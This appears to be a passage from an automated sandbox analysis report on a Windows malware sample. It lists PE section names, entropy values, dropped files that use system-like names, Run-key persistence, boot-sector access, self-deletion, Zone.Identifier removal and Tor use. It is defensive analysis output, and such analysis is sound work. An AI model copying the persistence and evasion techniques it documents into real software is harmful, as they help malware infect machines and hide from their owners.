                      Source: 78A4.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x7f9fb2
                      Source: _isdecmp.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x5528
                      Source: 78A4.tmp.20.drStatic PE information: real checksum: 0x0 should be: 0xad8f2
                      Source: EE8C.exe.2.drStatic PE information: real checksum: 0x0 should be: 0xf5955
                      Source: is-2VNVT.tmp.21.drStatic PE information: real checksum: 0x0 should be: 0xb9261
                      Source: _iscrypt.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x89d2
                      Source: _setup64.tmp.21.drStatic PE information: real checksum: 0x0 should be: 0x8546
                      Source: FourthX.exe.27.drStatic PE information: real checksum: 0x0 should be: 0x29585f
                      Source: InstallSetup4.exe.27.drStatic PE information: real checksum: 0x0 should be: 0x20eded
                      Source: IIBXMzS0zN.exeStatic PE information: section name: .vufugag
                      Source: IIBXMzS0zN.exeStatic PE information: section name: .jeyup
                      Source: 5A89.exe.2.drStatic PE information: section name: .fofufe
                      Source: 5A89.exe.2.drStatic PE information: section name: .safaz
                      Source: 6056.exe.2.drStatic PE information: section name: .
                      Source: 6056.exe.2.drStatic PE information: section name: .
                      Source: 6056.exe.2.drStatic PE information: section name: .
                      Source: AD52.exe.2.drStatic PE information: section name: .rofi
                      Source: AD52.exe.2.drStatic PE information: section name: .rehopeb
                      Source: AD52.exe.2.drStatic PE information: section name: .jidexi
                      Source: B68B.exe.2.drStatic PE information: section name: .wet
                      Source: B68B.exe.2.drStatic PE information: section name: .mixifi
                      Source: B68B.exe.2.drStatic PE information: section name: .civo
                      Source: 4312.exe.2.drStatic PE information: section name: .duseces
                      Source: 4312.exe.2.drStatic PE information: section name: .mesu
                      Source: 4312.exe.2.drStatic PE information: section name: .vuk
                      Source: egiibgt.2.drStatic PE information: section name: .vufugag
                      Source: egiibgt.2.drStatic PE information: section name: .jeyup
                      Source: ejiibgt.2.drStatic PE information: section name: .rofi
                      Source: ejiibgt.2.drStatic PE information: section name: .rehopeb
                      Source: ejiibgt.2.drStatic PE information: section name: .jidexi
                      Source: csrss.exe.8.drStatic PE information: section name: .fofufe
                      Source: csrss.exe.8.drStatic PE information: section name: .safaz
                      Source: anyburnfree.exe.21.drStatic PE information: section name: .cab7
                      Source: is-P1HCF.tmp.21.drStatic PE information: section name: /4
                      Source: is-72Q7F.tmp.21.drStatic PE information: section name: /4
                      Source: is-M6VRO.tmp.21.drStatic PE information: section name: /4
                      Source: is-9633C.tmp.21.drStatic PE information: section name: /4
                      Source: is-PUUKO.tmp.21.drStatic PE information: section name: /4
                      Source: is-I193V.tmp.21.drStatic PE information: section name: /4
                      Source: is-SB997.tmp.21.drStatic PE information: section name: /4
                      Source: is-2MD1R.tmp.21.drStatic PE information: section name: /4
                      Source: is-5HMK4.tmp.21.drStatic PE information: section name: /4
                      Source: is-5C03R.tmp.21.drStatic PE information: section name: /4
                      Source: is-E4NNM.tmp.21.drStatic PE information: section name: /4
                      Source: is-BNUL3.tmp.21.drStatic PE information: section name: /4
                      Source: is-7FTBB.tmp.21.drStatic PE information: section name: /4
                      Source: IMAP List Mailboxes 65.exe.24.drStatic PE information: section name: .cab7
                      Source: FourthX.exe.27.drStatic PE information: section name: .00cfg
                      Source: BroomSetup.exe.30.drStatic PE information: section name: .didata
                      Source: syncUpd[1].exe.30.drStatic PE information: section name: .sowa
                      Source: syncUpd[1].exe.30.drStatic PE information: section name: .xeyekus
                      Source: syncUpd[1].exe.30.drStatic PE information: section name: .jejol
                      Source: nsxAC73.tmp.30.drStatic PE information: section name: .sowa
                      Source: nsxAC73.tmp.30.drStatic PE information: section name: .xeyekus
                      Source: nsxAC73.tmp.30.drStatic PE information: section name: .jejol
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\6653.dll
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_00403253 push eax; ret 0_2_0040332D
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_00401C64 push es; retf 0_2_00401C83
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_0040332A push eax; ret 0_2_0040332D
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_00402F91 push 60B44389h; retf 0_2_00402FAB
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_001F1CCB push es; retf 0_2_001F1CEA
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_001F2FF8 push 60B44389h; retf 0_2_001F3012
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_00420EC0 push ecx; mov dword ptr [esp], 000343F0h0_2_00420EC1
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_00403253 push eax; ret 6_2_0040332D
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_00401C64 push es; retf 6_2_00401C83
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_0040332A push eax; ret 6_2_0040332D
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_00402F91 push 60B44389h; retf 6_2_00402FAB
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_001F1CCB push es; retf 6_2_001F1CEA
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_001F2FF8 push 60B44389h; retf 6_2_001F3012
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_00420EC0 push ecx; mov dword ptr [esp], 000343F0h6_2_00420EC1
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_007AD534 push eax; retf 6_2_007AD54D
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_007AD39C pushad ; retf 007Ah6_2_007AD39D
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_005CB960 push ecx; mov dword ptr [esp], 000343F0h7_2_005CB961
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_00401E25 push ecx; ret 7_2_00401E38
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_026E32EF push ebx; iretd 7_2_026E32F7
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_0275BEAC push eax; ret 7_2_0275BEAD
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_0273770A pushad ; ret 7_2_0273770C
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_027D57F8 push edx; retf 7_2_027D57F9
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_0279D7ED push ebp; retf 7_2_0279D7EE
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_0279D80A push 5A36841Dh; retf 7_2_0279D825
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_027D54BD push cs; ret 7_2_027D54BE
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_026738A8 push esp; ret 7_2_026738A9
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 8_2_00696299 push ecx; ret 8_2_006962AC
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: 10_2_0040A3BD push eax; retf 10_2_0040A3BE
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_009F30A0 push esp; iretd 14_2_009F30A7
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeCode function: 16_2_004065B8 push 004065F5h; ret 16_2_004065ED
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeCode function: 16_2_004040B5 push eax; ret 16_2_004040F1
                      Source: IIBXMzS0zN.exeStatic PE information: section name: .text entropy: 7.151495344283166
                      Source: EE8C.exe.2.drStatic PE information: section name: .text entropy: 7.562798636554906
                      Source: 6653.dll.2.drStatic PE information: section name: .text entropy: 7.994843734766698
                      Source: 5A89.exe.2.drStatic PE information: section name: .text entropy: 7.985255731332923
                      Source: AD52.exe.2.drStatic PE information: section name: .text entropy: 7.2499716488738954
                      Source: B68B.exe.2.drStatic PE information: section name: .text entropy: 7.23594445208119
                      Source: C338.exe.2.drStatic PE information: section name: .text entropy: 7.78984089955939
                      Source: 4312.exe.2.drStatic PE information: section name: .text entropy: 7.795149852238787
                      Source: egiibgt.2.drStatic PE information: section name: .text entropy: 7.151495344283166
                      Source: ejiibgt.2.drStatic PE information: section name: .text entropy: 7.2499716488738954
                      Source: csrss.exe.8.drStatic PE information: section name: .text entropy: 7.985255731332923
                      Source: anyburnfree.exe.21.drStatic PE information: section name: .text entropy: 7.703107959057831
                      Source: IMAP List Mailboxes 65.exe.24.drStatic PE information: section name: .text entropy: 7.703107959057831
                      Source: syncUpd[1].exe.30.drStatic PE information: section name: .text entropy: 7.5073579685533876
                      Source: nsxAC73.tmp.30.drStatic PE information: section name: .text entropy: 7.5073579685533876

                      Persistence and Installation Behavior

                      barindex
                      Contains functionality to infect the boot sector
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_00408951
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_00408951
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_00408958
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_00408958
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_0040895B
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_0040895B
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE017_2_0040895B
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE017_2_0040895B
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE017_2_00408951
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE017_2_00408951
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE017_2_00408958
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE017_2_00408958
                      Drops PE files with benign system names
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeFile created: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-9633C.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-I193V.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\libgcc_s_dw2-1.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\libvorbis-0.dll (copy)Jump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\EE8C.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\avformat-58.dll (copy)Jump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\78A4.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-P1HCF.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-PUUKO.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-CABAS.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeFile created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-7FTBB.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeFile created: C:\Users\user\AppData\Local\Temp\nsxAC73.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeFile created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-AQUGE.tmp\_isetup\_iscrypt.dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\AD52.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-5HMK4.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeFile created: C:\ProgramData\IMAP List Mailboxes 65\IMAP List Mailboxes 65.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\unins000.exe (copy)Jump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C338.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-BNUL3.tmpJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B68B.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\libogg-0.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\swresample-3.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-AQUGE.tmp\_isetup\_isdecmp.dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6653.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\zlib1.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\avcodec-58.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-72Q7F.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-AQUGE.tmp\_isetup\_shfoldr.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeFile created: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeFile created: C:\Users\user\AppData\Local\Temp\nsvA60A.tmp\INetC.dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5A89.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\libbz2-1.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\libiconv-2.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-E4NNM.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-5C03R.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\libvorbisenc-2.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\SDL2.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MHXXL5K6\syncUpd[1].exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6056.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6374.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\avutil-56.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\libwinpthread-1.dll (copy)Jump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\egiibgtJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-M6VRO.tmpJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ejiibgtJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeFile created: C:\Users\user\AppData\Local\Temp\BroomSetup.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-2VNVT.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-SB997.tmpJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4312.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-AQUGE.tmp\_isetup\_setup64.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeFile created: C:\Users\user\AppData\Local\Temp\FourthX.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\914D.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-2MD1R.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeFile created: C:\ProgramData\IMAP List Mailboxes 65\IMAP List Mailboxes 65.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\egiibgtJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ejiibgtJump to dropped file

                      Boot Survival

                      barindex
                      Contains functionality to infect the boot sector
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_00408951
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_00408951
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_00408958
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_00408958
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_0040895B
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_0040895B
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE017_2_0040895B
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE017_2_0040895B
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE017_2_00408951
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE017_2_00408951
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE017_2_00408958
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE017_2_00408958
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSSJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Deletes itself after installation
                      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\iibxmzs0zn.exeJump to behavior
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\egiibgt:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ejiibgt:Zone.Identifier read attributes | deleteJump to behavior
                      May use the Tor software to hide its network traffic
                      Source: 5A89.exe, 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: onion-port
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00423C04 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,18_2_00423C04
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00423C04 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,18_2_00423C04
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_004241D4 IsIconic,SetActiveWindow,SetFocus,18_2_004241D4
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_0042418C IsIconic,SetActiveWindow,18_2_0042418C
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_0041837C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,18_2_0041837C
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00422854 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,18_2_00422854
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00482EF8 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,18_2_00482EF8
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00417590 IsIconic,GetCapture,18_2_00417590
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00417CC6 IsIconic,SetWindowPos,18_2_00417CC6
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00417CC8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,18_2_00417CC8
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_0041F110 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,18_2_0041F110
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
